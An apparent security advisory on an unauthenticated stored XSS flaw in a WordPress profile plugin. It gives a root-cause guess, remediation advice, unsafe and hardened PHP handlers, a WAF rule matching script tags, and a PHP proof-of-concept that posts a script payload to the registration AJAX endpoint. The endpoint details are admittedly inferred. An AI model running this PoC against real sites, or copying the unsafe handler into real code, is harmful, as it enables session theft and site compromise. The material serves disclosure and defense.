Atomic Edge analysis of CVE-2026-42385 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the Profile Builder Pro plugin for WordPress, version 3.15.0 and earlier. It allows remote attackers to inject arbitrary web scripts without requiring authentication. The CVSS 3.1 score of 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) indicates a serious threat due to the network-based, low-complexity, no-authentication requirements and the changed scope (confidentiality and integrity impact on other resources).
Root Cause: The description identifies insufficient input sanitization and output escaping as the root cause. Based on the CWE classification (79) and the common patterns in WordPress plugin XSS vulnerabilities, Atomic Edge research infers the issue likely resides in a plugin-specific functionality that accepts user-controlled data (e.g., form fields, profile updates, or shortcode attributes) and stores it without proper sanitization. The absence of an authentication requirement suggests the vulnerable function does not perform capability checks or nonce verification before processing the input. The stored nature means the payload persists in the WordPress database (e.g., via user meta, post meta, or a custom table) and is rendered in administrator-facing pages or front-end templates.
Exploitation: An unauthenticated attacker can exploit this vulnerability by submitting a crafted request to a vulnerable endpoint that the plugin exposes. Likely targets include AJAX actions such as `wppb_register` or `wppb_update_profile` (common Profile Builder patterns), or any shortcode-based form handler that does not require login. The attacker would supply a payload like `alert('XSS')` or a more sophisticated JavaScript payload (e.g., for session hijacking) in a field that the plugin stores and later displays without HTML escaping. The payload executes in the browser of any user viewing the injected content, including administrators.
Remediation: The fix in version 3.15.1 almost certainly involves adding proper input sanitization using WordPress functions like `sanitize_text_field()` or `wp_kses()` for rich content, and output escaping using functions like `esc_html()`, `esc_attr()`, or `wp_kses_post()` when rendering the stored data. Developers should also add nonce verification and capability checks to endpoints processing unauthenticated requests to prevent arbitrary data submissions. The plugin maintainer must audit all instances where user input is stored and rendered without escaping.
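As an added illustration (not Profile Builder's own code), the store-and-render pattern the analysis describes, written as a minimal WordPress AJAX registration handler first in its unsafe form and then hardened the way the remediation section recommends; the hook, nonce, meta key and function names are assumptions.

```php
<?php
// Added example, not plugin code. Hook names, nonce action and meta key are hypothetical.

// --- Unsafe pattern: no nonce check, raw input stored, stored value echoed unescaped ---
add_action( 'wp_ajax_nopriv_example_register_unsafe', 'example_register_unsafe' );
function example_register_unsafe() {
    $user_id = wp_create_user( $_POST['username'], $_POST['password'], $_POST['email'] );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message() );
    }
    // Request value persisted to user meta exactly as received.
    update_user_meta( $user_id, 'first_name', $_POST['first_name'] );
    wp_send_json_success( 'registered' );
}
function example_render_unsafe( $user_id ) {
    // Any markup stored in the meta value becomes live HTML for whoever views this row.
    echo '<td>' . get_user_meta( $user_id, 'first_name', true ) . '</td>';
}

// --- Hardened pattern: nonce on the endpoint, sanitize on store, escape on render ---
add_action( 'wp_ajax_nopriv_example_register', 'example_register_hardened' );
function example_register_hardened() {
    // Dies with 403 unless the 'nonce' POST field matches the form's nonce action.
    check_ajax_referer( 'example_register_nonce', 'nonce' );
    $username   = sanitize_user( wp_unslash( $_POST['username'] ?? '' ), true );
    $email      = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
    // sanitize_text_field() strips tags and control characters before storage.
    $first_name = sanitize_text_field( wp_unslash( $_POST['first_name'] ?? '' ) );
    if ( '' === $username || ! is_email( $email ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }
    $user_id = wp_create_user( $username, (string) ( $_POST['password'] ?? '' ), $email );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 400 );
    }
    update_user_meta( $user_id, 'first_name', $first_name );
    wp_send_json_success( 'registered' );
}
function example_render_hardened( $user_id ) {
    // Escape at output regardless of what was stored: defense in depth against
    // values written by older code paths or direct database edits.
    echo '<td>' . esc_html( get_user_meta( $user_id, 'first_name', true ) ) . '</td>';
}
```

Only one of the two `add_action` registrations would exist in a real plugin; both are shown here so the unsafe and hardened handlers can be compared side by side.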
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim’s browser session. This can lead to theft of session cookies, redirection to malicious sites, defacement of WordPress pages, or extraction of sensitive data displayed on the page. Since the XSS is stored and affects all visitors, the attack can spread across multiple users without repeated exploitation attempts. The changed scope in the CVSS vector indicates the affected component (the plugin’s data store) is separate from the vulnerable component, meaning an attacker can impact resources beyond the initial application boundaries.
Here you will find our ModSecurity compatible rule to protect against this particular CVE. Note that it only inspects the first_name parameter of the wppb_register action for a literal <script> element, so a payload placed in another field or carried by an event-handler attribute will not match; treat it as a stopgap alongside updating to 3.15.1, not as a substitute.
# Atomic Edge WAF Rule - CVE-2026-42385 (metadata-based)
# Block unauthenticated XSS payloads via Profile Builder Pro registration AJAX handler
# Chained rule: all three SecRule conditions must match for the request to be denied.
# REQUEST_FILENAME is used instead of REQUEST_URI so a trailing query string does not break @streq.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:20261985,phase:2,deny,status:403,chain,msg:'CVE-2026-42385 - Profile Builder Pro Stored XSS via wppb_register',severity:'CRITICAL',tag:'CVE-2026-42385'"
    SecRule ARGS_POST:action "@streq wppb_register" \
        "chain"
    # Decode before lowercasing; (?s) lets the match span a payload that contains newlines.
    SecRule ARGS_POST:first_name "@rx (?s)<script[^>]*>.*</script>" \
        "t:none,t:urlDecodeUni,t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-42385 - Profile Builder Pro <= 3.15.0 - Unauthenticated Stored XSS
/*
 * This PoC demonstrates exploitation of the unauthenticated stored XSS
 * vulnerability. It targets a likely AJAX endpoint (wppb_register) used by
 * the Profile Builder plugin for user registration forms. The payload is
 * injected into a field that is stored and later rendered without escaping.
 *
 * Assumptions:
 * 1. The plugin uses admin-ajax.php with action 'wppb_register' for
 *    registration handling (common for this plugin).
 * 2. The 'first_name' field is insufficiently sanitized and stored.
 * 3. The victim site displays the submitted data on a profile page or
 *    admin panel.
 *
 * If the actual endpoint differs, modify $action below.
 */
// Configuration
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site
$action = 'wppb_register'; // AJAX action for registration
$payload = '<script>alert("CVE-2026-42385");</script>'; // XSS payload
// Build request data
$data = array(
    'action'     => $action,
    'first_name' => $payload, // Injected XSS payload
    'last_name'  => 'Test',
    'email'      => 'attacker@example.com', // Valid format to bypass basic checks
    'username'   => 'testuser_' . time(),
    'password'   => 'P@ssw0rd123!',
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check result (the newline escapes were lost in the original listing; restored here)
if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[*] Exploit delivered successfully.\n";
    echo "[*] Payload: $payload\n";
    echo "[*] Check any page displaying user data (e.g., admin users list).\n";
} else {
    echo "[-] Request failed. HTTP code: $http_code\n";
    echo "[-] Response: $response\n";
    echo "[*] Note: The exact endpoint may differ. If no success, try other actions.\n";
}
?>